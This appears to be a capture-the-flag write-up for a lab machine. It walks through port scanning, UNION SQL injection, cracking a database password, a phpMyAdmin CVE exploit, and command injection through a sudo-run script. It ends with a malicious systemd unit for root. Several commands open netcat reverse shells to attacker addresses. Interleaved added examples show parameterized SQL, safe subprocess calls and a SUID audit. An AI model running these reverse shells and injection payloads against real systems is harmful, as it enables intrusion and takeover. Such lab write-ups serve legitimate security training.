Let's identify the open ports.

```bash
nmap -p- --min-rate 10000 10.10.10.143
```

Let's run a more detailed nmap scan (default scripts and version detection) against the open ports.

```bash
nmap -sC -sV -p22,80,64999 10.10.10.143 -Pn
```

Directory brute-forcing.

```bash
gobuster dir -u http://10.10.10.143 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php -t 40
```

Here I find 'room.php', whose 'cod' parameter is vulnerable to SQLi.

I did manual SQLi, confirmed the parameter is injectable, and then performed UNION-based SQLi.

I searched the internet for how to get the phpliteadmin password and found that it can be read from the 'mysql.user' table, so I grabbed it from there.
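
Added example (not part of this writeup or the target application's code): the injectable lookup pattern the 'cod' parameter implies, beside its parameterized form. It uses an in-memory SQLite database with a hypothetical 'room' table and a constructed 'app_user' table standing in for data the application never meant to expose; the schema, rows and hash value are invented for the demo.

```python
import sqlite3

# Constructed stand-in for the room lookup behind room.php: a hypothetical
# 'room' table with a numeric 'cod' column, plus a second table that holds
# data the page should never return. Nothing here comes from the real app.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE room (cod INTEGER PRIMARY KEY, name TEXT, price INTEGER)")
    conn.executemany(
        "INSERT INTO room VALUES (?, ?, ?)",
        [(1, "Superior Family", 120), (2, "Suite", 200), (3, "Double", 90)],
    )
    conn.execute("CREATE TABLE app_user (id INTEGER, login TEXT, pwhash TEXT)")
    conn.execute("INSERT INTO app_user VALUES (1, 'DBadmin', '<constructed-hash>')")
    return conn


def lookup_room_vulnerable(conn, cod):
    # The bug: the request parameter is pasted straight into the SQL text, so
    # the database parses whatever the client sent as part of the query.
    query = "SELECT cod, name, price FROM room WHERE cod = " + cod
    return conn.execute(query).fetchall()


def lookup_room_safe(conn, cod):
    # Hardened: enforce the expected type first, then bind the value as a
    # parameter so it can only ever be compared, never parsed as SQL.
    try:
        cod_int = int(cod)
    except (TypeError, ValueError):
        return []
    return conn.execute(
        "SELECT cod, name, price FROM room WHERE cod = ?", (cod_int,)
    ).fetchall()


def demo():
    """Run the same two inputs through both versions and return the results."""
    conn = make_db()
    tautology = "1 OR 1=1"                                   # returns every row
    union = "0 UNION SELECT id, login, pwhash FROM app_user"  # returns another table
    return {
        "normal": lookup_room_vulnerable(conn, "2"),
        "vuln_tautology": lookup_room_vulnerable(conn, tautology),
        "vuln_union": lookup_room_vulnerable(conn, union),
        "safe_normal": lookup_room_safe(conn, "2"),
        "safe_tautology": lookup_room_safe(conn, tautology),
        "safe_union": lookup_room_safe(conn, union),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(label, rows)
```

The UNION case is why a column count leak matters: once the attacker's SELECT has the same number of columns as the original, any table the database user can read comes back through the room listing. The fix is the type check plus the bound parameter; escaping alone would not help an integer column.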

I grab the MD5 hash of the 'DBadmin' user's password and crack it with the online CrackStation service.

```
DBadmin: 2d2b7a5e4e637b8fba1d17f40318f277d29964d0: imissyou
```

After entering the above credentials, I am on the phpliteadmin dashboard.

I see that the phpmyadmin version is 4.8.0.

Let's search for an exploit for this version.

I found the CVE-2018-12613 exploit for this version.

I download the exploit to my machine and run it.

I run the script against my target and IT WORKED.

Let's add a reverse shell here:

```bash
nc -e /bin/sh 10.10.14.8 443
```

I spawned an interactive shell:

```bash
python -c 'import pty;pty.spawn("/bin/bash")'
# press CTRL+Z to background the shell
stty raw -echo;fg

export TERM=xterm
export SHELL=bash
```

I check the sudo privileges of the 'www-data' user.

Then I enumerate the script itself and see that command injection is possible because of this line:

```python
os.system('ping ' + command)
```

Now I add my reverse shell bash script to the 'tmp' folder.

```bash
echo -e '#!/bin/bash\n\nnc -e /bin/bash 10.10.16.4 7654' > /tmp/dr4ks.sh
```

And give this file execute permission.

```bash
chmod +x /tmp/dr4ks.sh
```

Now I run this script with 'sudo' as the pepper user.

```bash
sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
```

Then, when prompted, I enter my script as the injected command: `$(/tmp/dr4ks.sh)`
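
Added example (not part of this writeup or of simpler.py): the `os.system('ping ' + command)` pattern quoted above next to a hardened version that validates the target and hands an argument list to `subprocess` with no shell. The function names, the hostname rule and the `-c 1` ping count are choices made for this example, not the script's own; it also covers the sudo step above, since a script run through sudo inherits every injection bug in its input handling.

```python
import ipaddress
import os
import subprocess


def ping_vulnerable(command):
    # The pattern from simpler.py: the user string becomes part of a shell
    # command line, so $(...), ;, | and friends are interpreted by /bin/sh
    # before ping ever runs. Kept here only as the "before" for comparison.
    return os.system("ping " + command)


def is_valid_target(value):
    """Accept an IPv4/IPv6 literal or a plain hostname; reject shell syntax.

    Hypothetical rule for this example: letters, digits, '.' and '-' only,
    at most 253 characters, and no leading '-' so it cannot be read as an option.
    """
    if not isinstance(value, str) or not value:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    allowed = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789.-")
    return len(value) <= 253 and set(value) <= allowed and not value.startswith("-")


def build_ping_argv(target, count=1):
    """Return the argv for a single ping; raises on anything that fails validation."""
    if not is_valid_target(target):
        raise ValueError("rejected target: %r" % (target,))
    return ["ping", "-c", str(count), target]


def ping_safe(target):
    # No shell is involved: the list goes straight to execve, so a value like
    # "$(/tmp/x.sh)" would be just bytes in a hostname (and is rejected anyway).
    argv = build_ping_argv(target)
    result = subprocess.run(argv, capture_output=True, text=True, timeout=10)
    return result.returncode


if __name__ == "__main__":
    for candidate in ["10.10.10.143", "example.org", "$(/tmp/dr4ks.sh)", "127.0.0.1; id", "-f"]:
        print("%-22s valid=%s" % (candidate, is_valid_target(candidate)))
```

The two changes are independent and both matter: the allowlist stops the metacharacters from reaching any interpreter, and `subprocess.run` with a list removes the interpreter from the path entirely, so a future validation gap does not turn back into code execution. When such a script is granted through sudoers, that rule is effectively granting whatever the script's weakest input check allows.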

Now I am the pepper user.

user.txt

Let's search SUID files for privilege escalation.

```bash
find / -type f -perm /4000 2>/dev/null
```

I found these and chose '/bin/systemctl' for privilege escalation (see GTFOBins).

```bash
# FIRST
cat >dr4ks.service<<EOF
[Service]
Type=notify
ExecStart=/bin/bash -c 'nc -e /bin/bash 10.10.16.4 2003'
KillMode=process
Restart=on-failure
RestartSec=42s

[Install]
WantedBy=multi-user.target
EOF

# SECOND
systemctl link /home/pepper/dr4ks.service

# THIRD
systemctl start dr4ks
```
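
Added example (not part of this writeup): the defender's side of the SUID search above, a small audit that compares the setuid binaries present on a host with a known-good baseline and flags anything extra, which is how a stray setuid bit on `systemctl` would surface before anyone used it. The sample `find` output and the baseline allowlist are constructed for this example; a real baseline comes from a clean image of the same OS release.

```python
import os
import shutil
import stat
import tempfile

# Constructed sample of what `find / -type f -perm /4000` might print; the
# real list on the box is longer. Only /bin/systemctl is outside the baseline.
SAMPLE_FIND_OUTPUT = """\
/bin/su
/bin/mount
/bin/umount
/bin/systemctl
/usr/bin/passwd
/usr/bin/sudo
"""

# Hypothetical allowlist of setuid binaries expected on this host.
BASELINE_SUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/usr/bin/passwd", "/usr/bin/sudo",
}


def parse_find_output(text):
    """Turn one path per line into a list, ignoring blank lines."""
    return [line.strip() for line in text.splitlines() if line.strip()]


def unexpected_suid(paths, baseline=BASELINE_SUID):
    """Return the setuid binaries that are not in the baseline, sorted."""
    return sorted(p for p in paths if p not in baseline)


def scan_suid(root):
    """Walk a tree and return regular files with the setuid bit set.

    lstat is used so symlinks are not followed; unreadable entries are skipped.
    """
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)


def demo_scan():
    """Create a throwaway tree with one setuid file and one plain file, scan it, clean up."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    try:
        suid_path = os.path.join(root, "setuid-tool")
        plain_path = os.path.join(root, "plain-tool")
        for p in (suid_path, plain_path):
            with open(p, "w") as f:
                f.write("#!/bin/sh\nexit 0\n")
        os.chmod(suid_path, 0o4755)   # rwsr-xr-x
        os.chmod(plain_path, 0o755)   # rwxr-xr-x
        return [os.path.basename(p) for p in scan_suid(root)]
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for path in unexpected_suid(parse_find_output(SAMPLE_FIND_OUTPUT)):
        print("unexpected setuid binary:", path)
    print("demo scan found:", demo_scan())
```

Run the scanner against `/usr` and `/bin` from a cron job or a configuration-management check and diff the result against the baseline; `systemctl` showing up there is the finding, independent of any particular trick for using it.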

root.txt
